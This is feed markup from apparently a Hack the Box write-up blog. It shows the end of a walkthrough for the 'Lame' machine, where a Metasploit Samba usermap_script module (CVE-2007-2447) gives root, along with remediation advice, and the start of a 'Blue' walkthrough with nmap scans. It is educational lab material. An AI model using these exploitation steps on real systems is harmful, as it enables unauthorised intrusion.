href="https://substackcdn.com/image/fetch/$s_!69io!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!69io!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png 424w, https://substackcdn.com/image/fetch/$s_!69io!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png 848w, https://substackcdn.com/image/fetch/$s_!69io!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png 1272w, https://substackcdn.com/image/fetch/$s_!69io!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!69io!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/bec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!69io!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png 424w, https://substackcdn.com/image/fetch/$s_!69io!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png 848w, https://substackcdn.com/image/fetch/$s_!69io!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png 1272w, https://substackcdn.com/image/fetch/$s_!69io!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbec66e5b-15f1-4a56-ac3f-4df09d17de37_800x367.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>We find the module associated with our version (usermap script). Input RHOST, Payload, LHOST, and LPORT then run.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!YwnW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!YwnW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png 424w, https://substackcdn.com/image/fetch/$s_!YwnW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png 848w, https://substackcdn.com/image/fetch/$s_!YwnW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png 1272w, https://substackcdn.com/image/fetch/$s_!YwnW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!YwnW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!YwnW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png 424w, https://substackcdn.com/image/fetch/$s_!YwnW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png 848w, https://substackcdn.com/image/fetch/$s_!YwnW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png 1272w, https://substackcdn.com/image/fetch/$s_!YwnW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F38fc3b83-bca1-4c96-afef-0e6ca816aa41_800x404.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kssn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kssn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png 424w, https://substackcdn.com/image/fetch/$s_!kssn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png 848w, https://substackcdn.com/image/fetch/$s_!kssn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png 1272w, https://substackcdn.com/image/fetch/$s_!kssn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kssn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/af5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kssn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png 424w, https://substackcdn.com/image/fetch/$s_!kssn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png 848w, https://substackcdn.com/image/fetch/$s_!kssn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png 1272w, https://substackcdn.com/image/fetch/$s_!kssn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Faf5a26dc-5fbe-4fd6-9292-7d83ad9c749b_800x329.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>OOOOOH. <em><strong>whoami</strong></em><strong> says we are root. </strong>Let&#8217;s go for the gold and get out of here.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ie8I!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ie8I!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png 424w, https://substackcdn.com/image/fetch/$s_!ie8I!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png 848w, https://substackcdn.com/image/fetch/$s_!ie8I!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png 1272w, https://substackcdn.com/image/fetch/$s_!ie8I!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ie8I!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ie8I!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png 424w, https://substackcdn.com/image/fetch/$s_!ie8I!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png 848w, https://substackcdn.com/image/fetch/$s_!ie8I!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png 1272w, https://substackcdn.com/image/fetch/$s_!ie8I!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4c1ec551-cdb2-47ab-96c3-8604925a3436_800x768.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Root before user??! Wowee!</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!WPVG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!WPVG!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png 424w, https://substackcdn.com/image/fetch/$s_!WPVG!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png 848w, https://substackcdn.com/image/fetch/$s_!WPVG!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png 1272w, https://substackcdn.com/image/fetch/$s_!WPVG!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!WPVG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/a4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!WPVG!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png 424w, https://substackcdn.com/image/fetch/$s_!WPVG!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png 848w, https://substackcdn.com/image/fetch/$s_!WPVG!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png 1272w, https://substackcdn.com/image/fetch/$s_!WPVG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4aa0172-a1d8-4615-830d-a959ef6991d8_800x502.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h3>Findings, Sample Code, and Flags</h3><p>Finding 1: An outdated version of Samba was installed and open without filtering on the network, allowing the adversary to use a CVE from 2007 to compromise the host.</p><h3>Additional Actions</h3><p>None.</p><h3>High-Level Summary and Recommendations</h3><p>C_3PJoe (the adversary) was commissioned to perform a penetration test of the host Lame (the victim) in an effort to see what vulnerabilities existed within the system and determine what paths to exploitation existed. Through using outdated SAMBA (file sharing) software, the adversary was able to use a public exploit from 2007 to gain administrative access.</p><p>From here, the adversary was logged in as root (Administrative permissions) and could have effectively taken the system completely over or used it to pivot to other hosts.</p><p>The adversary recommends implementing a verbose vulnerability management program to patch the operating systems and software on the systems.</p><p>Specific recommendations include following the guidance from the Common Vulnerabilities and Exposures (CVE) found <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447">here</a> and updating SAMBA to the latest stable release (4.10.7) available <a href="https://download.samba.org/pub/samba/stable/samba-4.10.7.tar.gz">here</a>.</p><h3>Tools Used</h3><p>nmap<br>ftp<br>smbclient<br>enum4linux<br>SearchSploit<br>Metasploit</p><p>Other Walktroughs:</p><p><a href="https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560">Arctic</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-blue-7fe9eb09d15">Blue</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-legacy-147bbcc9ff02">Legacy</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-mirai-83b22174f03b">Mirai</a></p>]]></content:encoded></item><item><title><![CDATA[HTB Retired Box Walkthrough: Blue]]></title><description><![CDATA[Blue is a retired Windows machine that is rated as Easy on Hack the Box.]]></description><link>https://tidbit.theosintion.com/p/htb-retired-box-walkthrough-blue-7fe9eb09d15</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/htb-retired-box-walkthrough-blue-7fe9eb09d15</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Fri, 30 Aug 2019 22:42:07 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!Gn6e!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Blue is a retired Windows machine that is rated as Easy on Hack the Box.</p><blockquote><p><em>Hostname: Blue<br>IP: 10.10.10.40<br>Operating System: Windows</em></p></blockquote><h3>Port Scan Results*</h3><p>A simple nmap port scan <em>nmap -vvvvv 10.10.10.40 yields the following ports:</em></p><blockquote><p><em>135/tcp: msrpc<br>139/tcp: netbios-ssn<br>445/tcp: microsoft-ds<br>49152/tcp: unknown<br>49153/tcp: unknown<br>49154/tcp: unknown<br>49155/tcp: unknown<br>49156/tcp: unknown<br>49157/tcp: unknown</em></p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Gn6e!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Gn6e!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png 424w, https://substackcdn.com/image/fetch/$s_!Gn6e!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png 848w, https://substackcdn.com/image/fetch/$s_!Gn6e!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png 1272w, https://substackcdn.com/image/fetch/$s_!Gn6e!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Gn6e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/06910eab-49f3-4138-9012-5d4271c1643d_800x547.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Gn6e!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png 424w, https://substackcdn.com/image/fetch/$s_!Gn6e!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png 848w, https://substackcdn.com/image/fetch/$s_!Gn6e!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png 1272w, https://substackcdn.com/image/fetch/$s_!Gn6e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F06910eab-49f3-4138-9012-5d4271c1643d_800x547.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><h3>Further Enumeration*</h3><p>This initial port scan didn&#8217;t give us much. We need to approach this with a three-pronged attack. 1: amp up our nmap, 2: look at the actual website, and 3: go snooping through the directories.</p><p>For the next part of enumeration, I attempt a service version scan using nmap <em>nmap -vvvvvv -sTV 10.10.10.40.</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!GrZi!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!GrZi!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png 424w, https://substackcdn.com/image/fetch/$s_!GrZi!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png 848w, https://substackcdn.com/image/fetch/$s_!GrZi!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1680983b-bb52-40cd-9e1f-3ee1583af63e_800x629.png 1272w, 